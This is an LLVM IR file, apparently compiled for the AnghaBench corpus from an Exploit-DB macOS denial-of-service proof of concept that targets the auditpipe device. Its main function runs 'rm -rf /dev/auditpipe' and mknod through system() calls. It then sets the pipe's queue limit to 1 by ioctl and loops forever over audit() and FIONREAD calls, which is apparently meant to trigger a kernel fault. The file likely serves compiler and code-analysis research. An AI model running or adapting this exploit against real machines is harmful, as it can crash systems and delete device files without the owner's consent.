; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/macos/dos/extr_41797.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/macos/dos/extr_41797.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [22 x i8] c"rm -rf /dev/auditpipe\00", align 1
@.str.1 = private unnamed_addr constant [29 x i8] c"mknod /dev/auditpipe c 10 32\00", align 1
@.str.2 = private unnamed_addr constant [15 x i8] c"/dev/auditpipe\00", align 1
@O_RDWR = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [33 x i8] c"failed to open auditpipe device\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [15 x i8] c"opened device\0A\00", align 1
@.str.5 = private unnamed_addr constant [17 x i8] c"touch a_log_file\00", align 1
@.str.6 = private unnamed_addr constant [11 x i8] c"a_log_file\00", align 1
@.str.7 = private unnamed_addr constant [30 x i8] c"failed to set a new log file\0A\00", align 1
@AUDITPIPE_SET_QLIMIT = common dso_local global i32 0, align 4
@.str.8 = private unnamed_addr constant [21 x i8] c"AUDITPIPE_SET_QLIMIT\00", align 1
@.str.9 = private unnamed_addr constant [7 x i8] c"thello\00", align 1
@FIONREAD = common dso_local global i32 0, align 4
@.str.10 = private unnamed_addr constant [9 x i8] c"FIONREAD\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i8*, align 8
  %11 = alloca i32, align 4
  %12 = alloca i32, align 4
  %13 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %14 = call i32 @system(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str, i64 0, i64 0))
  %15 = call i32 @system(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.1, i64 0, i64 0))
  %16 = load i32, i32* @O_RDWR, align 4
  %17 = call i32 @open(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.2, i64 0, i64 0), i32 %16)
  store i32 %17, i32* %6, align 4
  %18 = load i32, i32* %6, align 4
  %19 = icmp eq i32 %18, -1
  br i1 %19, label %20, label %24

20:                                               ; preds = %2
  %21 = call i32 @perror(i8* getelementptr inbounds ([33 x i8], [33 x i8]* @.str.3, i64 0, i64 0))
  %22 = load i32, i32* @EXIT_FAILURE, align 4
  %23 = call i32 @exit(i32 %22) #3
  unreachable

24:                                               ; preds = %2
  %25 = call i32 @printf(i8* getelementptr inbounds ([15 x i8], [15 x i8]* @.str.4, i64 0, i64 0))
  %26 = call i32 @system(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.5, i64 0, i64 0))
  %27 = call i32 @auditctl(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.6, i64 0, i64 0))
  store i32 %27, i32* %7, align 4
  %28 = load i32, i32* %7, align 4
  %29 = icmp eq i32 %28, -1
  br i1 %29, label %30, label %32

30:                                               ; preds = %24
  %31 = call i32 @perror(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str.7, i64 0, i64 0))
  br label %32

32:                                               ; preds = %30, %24
  store i32 1, i32* %8, align 4
  %33 = load i32, i32* %6, align 4
  %34 = load i32, i32* @AUDITPIPE_SET_QLIMIT, align 4
  %35 = call i32 @ioctl(i32 %33, i32 %34, i32* %8)
  store i32 %35, i32* %9, align 4
  %36 = load i32, i32* %9, align 4
  %37 = icmp eq i32 %36, -1
  br i1 %37, label %38, label %42

38:                                               ; preds = %32
  %39 = call i32 @perror(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.8, i64 0, i64 0))
  %40 = load i32, i32* @EXIT_FAILURE, align 4
  %41 = call i32 @exit(i32 %40) #3
  unreachable

42:                                               ; preds = %32
  br label %43

43:                                               ; preds = %42, %59
  store i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.9, i64 0, i64 0), i8** %10, align 8
  %44 = load i8*, i8** %10, align 8
  %45 = call i32 @strlen(i8* %44)
  %46 = add nsw i32 %45, 1
  store i32 %46, i32* %11, align 4
  %47 = load i8*, i8** %10, align 8
  %48 = load i32, i32* %11, align 4
  %49 = call i32 @audit(i8* %47, i32 %48)
  store i32 0, i32* %12, align 4
  %50 = load i32, i32* %6, align 4
  %51 = load i32, i32* @FIONREAD, align 4
  %52 = call i32 @ioctl(i32 %50, i32 %51, i32* %8)
  store i32 %52, i32* %13, align 4
  %53 = load i32, i32* %13, align 4
  %54 = icmp eq i32 %53, -1
  br i1 %54, label %55, label %59

55:                                               ; preds = %43
  %56 = call i32 @perror(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.10, i64 0, i64 0))
  %57 = load i32, i32* @EXIT_FAILURE, align 4
  %58 = call i32 @exit(i32 %57) #3
  unreachable

59:                                               ; preds = %43
  br label %43
}

declare dso_local i32 @system(i8*) #1

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @perror(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @auditctl(i8*) #1

declare dso_local i32 @ioctl(i32, i32, i32*) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @audit(i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
